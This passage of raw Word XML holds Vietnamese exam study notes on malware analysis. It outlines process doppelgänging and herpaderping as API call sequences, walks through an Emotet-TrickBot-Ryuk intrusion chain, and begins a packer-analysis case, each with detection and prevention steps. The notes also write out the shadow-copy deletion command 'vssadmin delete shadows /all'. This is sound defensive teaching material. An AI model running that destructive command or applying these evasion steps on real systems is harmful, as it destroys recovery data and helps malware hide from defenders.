    <w:p w14:paraId="5D36A644" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>RollbackTransaction               → hủy transaction → file biến mất</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14956BE0" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>NtCreateProcessEx                 → chạy process từ section, 0 file trên disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43583CCD" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">→ Ví dụ: </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Osiris Banking Trojan, SynAck Ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2168CE" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process Herpaderping</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> (bypass scan-on-create):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBE62A1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>Write payload xuống disk          → giữ handle mở</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA9262" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>NtCreateSection (SEC_IMAGE)       → load payload vào memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092E6F8E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:lastRenderedPageBreak/>
        <w:t>NtCreateProcessEx                 → tạo process từ section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557A45AB" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>WriteFile (ghi đè benign content) → file trên disk = sạch, memory = độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECF9BF8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>NtCreateThreadEx                  → chạy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F53AF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t>→ File trên disk trông lành tính, nhưng memory đang chạy mã độc</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:br/>
        <w:t xml:space="preserve">→ Phát hiện: </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sysmon Event ID 25 (ProcessTampering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A2B34" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="1FBF032E">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="02384070" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>④ Phòng chống &amp; Khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430CB44C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596D9683" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Sysmon Event ID 8 (CreateRemoteThread), 10 (ProcessAccess), 25 (ProcessTampering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C33F455" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Volatility: malfind (vùng nhớ RWX không có backing file), hollowfind, ldrmodules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50314B6D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>So sánh memory layout của svchost.exe với PE header trên disk — nếu khác → hollowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2779AE" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phòng chống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B73BCF7" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>EDR giám sát chuỗi API bất thường: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread từ cùng một tiến trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4224FE69" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Block NtUnmapViewOfSection call từ user-mode process không xác định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2040E234" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Disable NTFS Transactions nếu không cần (ngăn Doppelgänging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432B97B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Memory integrity scan định kỳ: phát hiện vùng nhớ RWX unbacked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5902A6A8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="7DE9BF71">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C0685A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="0B625A0D">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51701F0F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CÂU 1 TỰ LUẬN — DẠNG 4: APT + EMOTET CHAIN (~40%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55645E89" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Công ty ABC bị tấn công theo chuỗi: nhân viên nhận email bình thường, vài tuần sau phát hiện toàn bộ dữ liệu khách hàng đã bị đánh cắp và hệ thống bị mã hóa đòi tiền chuộc. Không ai biết sự xâm nhập bắt đầu từ khi nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B90AE" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="57254BE9">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="333A0DB2" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>① Xác định loại malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C3F21" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">APT (Advanced Persistent Threat) sử dụng chuỗi </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Emotet → TrickBot → Ryuk</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7EAA2F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Emotet</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t>: loader/botnet, xâm nhập ban đầu qua phishing, persistence 3-12 tháng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5394B5" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TrickBot</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t>: thu thập credential, lateral movement, recon nội bộ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647CB01B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ryuk Ransomware</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t>: payload cuối — mã hóa toàn bộ, đòi tiền chuộc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CD92C" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="4CDE0368">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A42CE6" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>② Hậu quả giấu hiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535B4B12" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Emotet nằm im 3-12 tháng trước khi kích hoạt → không ai biết đã bị xâm nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BD15F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Dùng LoLBins (PowerShell, WMI) → hành vi giống admin bình thường</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C0F91" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Polymorphic → AV không nhận diện được mẫu cố định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6DF06F" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Lateral movement bằng credential hợp lệ đã đánh cắp → log trông như đăng nhập thật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ADCC74" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="7C359DD8">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D898156" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>③ Cơ chế — APT Kill Chain 6 bước</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F33C28B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Phishing email → macro Word/Excel → cmd.exe → PowerShell download Emotet payload về RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB238B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Registry Run key (HKCU\...\Run) + WMI Subscription (__EventFilter + CommandLineEventConsumer) → tồn tại qua reboot không cần file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F4532" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense Evasion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Polymorphic code (mỗi lần update = signature mới), dùng regsvr32, rundll32 (LoLBins), mã hóa traffic C2 qua HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111E3D66" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Access + Discovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> TrickBot dump credential (Mimikatz-style), scan mạng nội bộ (Active Directory recon), đánh cắp email history (thread hijacking cho phishing tiếp theo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5026284D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lateral Movement:</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Pass-the-Hash, PsExec lây sang máy khác trong mạng bằng credential đã đánh cắp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E4FF4B" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (Impact):</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve"> Ryuk Ransomware mã hóa toàn bộ file, xóa shadow copy (vssadmin delete shadows /all), đòi tiền chuộc Bitcoin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0622BA9D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="2FF56B58">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5DCEC1" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>④ Phòng chống &amp; Khắc phục</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D1CB63" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Khắc phục:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15743F74" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:lastRenderedPageBreak/>
        <w:t>Cô lập ngay máy nhiễm khỏi mạng, không reboot (mất evidence trong RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B2F83E" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Volatility dump memory → tìm Emotet injection signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA37B8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Reset toàn bộ credential trong AD (vì TrickBot đã dump)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F68557A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Restore từ backup offline (không phải backup online — Ryuk có thể đã mã hóa cả backup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A3F5AC" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Phòng chống:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D14A4D9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Disable macro Office theo mặc định; bật Protected View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C04D8BF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>MFA cho toàn bộ tài khoản AD → chặn Pass-the-Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FBEEE8" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>Network segmentation → lateral movement không đi được toàn mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08F3BF" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t>SIEM correlation rule: phát hiện chuỗi Word → PowerShell → network connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7BF2CD" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">Backup theo quy tắc </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3-2-1</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:t>: 3 bản, 2 media, 1 offline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741E8B98" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="7523DCD1">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DE406D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="7BDB338F">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="335A7954" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CÂU 1 TỰ LUẬN — DẠNG 5: PACKER/UNPACKING (~30%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED5C4A" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Analyst nhận được file exe nghi ngờ: kích thước nhỏ bất thường, entropy section .text đo được ~7.8/8.0, IAT gần như trống chỉ có LoadLibraryA và GetProcAddress, AV không phát hiện gì.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFA5562" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00000000" w:rsidP="00451406">
      <w:r>
        <w:pict w14:anchorId="2355FC0C">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAA438D" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>① Xác định</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE65D9" w14:textId="77777777" w:rsidR="00451406" w:rsidRPr="00451406" w:rsidRDefault="00451406" w:rsidP="00451406">
      <w:r w:rsidRPr="00451406">
        <w:t xml:space="preserve">File đã được </w:t>
      </w:r>
      <w:r w:rsidRPr="00451406">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
